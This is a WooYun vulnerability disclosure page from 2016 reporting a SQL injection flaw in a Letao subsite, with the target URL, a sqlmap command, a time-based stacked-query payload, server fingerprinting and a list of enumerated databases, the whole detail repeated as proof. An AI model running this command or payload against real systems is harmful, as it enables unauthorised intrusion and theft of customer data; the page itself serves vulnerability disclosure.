当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0172654

漏洞标题:乐淘某站另一处sql注入漏洞泄露800万会员信息

相关厂商:乐淘网

漏洞作者: 路人甲

提交时间:2016-01-26 08:15

修复时间:2016-01-31 08:20

公开时间:2016-01-31 08:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-26: 细节已通知厂商并且等待厂商处理中
2016-01-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

乐淘某站存在sql注入漏洞泄露800万会员信息

详细说明:

今天逛乌云,看到乐淘网某站公开了漏洞
地址如下: WooYun: 乐淘网某分站存在SQL注入漏洞(800万+用户信息)
心想一个站有问题,其他处肯定还是有问题,于是测试了下,功夫不负有心人,终于找到了哈
漏洞地址:http://huan.letao.com/wap/shoe.aspx?add=&iid=-1&pid=967243173
使用SQLMAP

sqlmap -u "http://huan.letao.com/wap/shoe.aspx?add=&iid=-1&pid=967243173" --dbs


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: iid (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: add=&iid=-1;WAITFOR DELAY '0:0:5'--&pid=967243173
---
[17:56:21] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008


数据库信息

available databases [11]:
[*] ASPState
[*] distribution
[*] ImagesRecord
[*] letao_accounting
[*] Letao_Web_Log
[*] letaoerp
[*] master
[*] model
[*] msdb
[*] tempdb
[*] test2_letaoerp


由于是延时注入就不在跑了哈

漏洞证明:

今天逛乌云,看到乐淘网某站公开了漏洞
地址如下: WooYun: 乐淘网某分站存在SQL注入漏洞(800万+用户信息)
心想一个站有问题,其他处肯定还是有问题,于是测试了下,功夫不负有心人,终于找到了哈
漏洞地址:http://huan.letao.com/wap/shoe.aspx?add=&iid=-1&pid=967243173
使用SQLMAP

sqlmap -u "http://huan.letao.com/wap/shoe.aspx?add=&iid=-1&pid=967243173" --dbs


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: iid (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: add=&iid=-1;WAITFOR DELAY '0:0:5'--&pid=967243173
---
[17:56:21] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008


数据库信息

available databases [11]:
[*] ASPState
[*] distribution
[*] ImagesRecord
[*] letao_accounting
[*] Letao_Web_Log
[*] letaoerp
[*] master
[*] model
[*] msdb
[*] tempdb
[*] test2_letaoerp


由于是延时注入就不在跑了哈

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-31 08:20

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价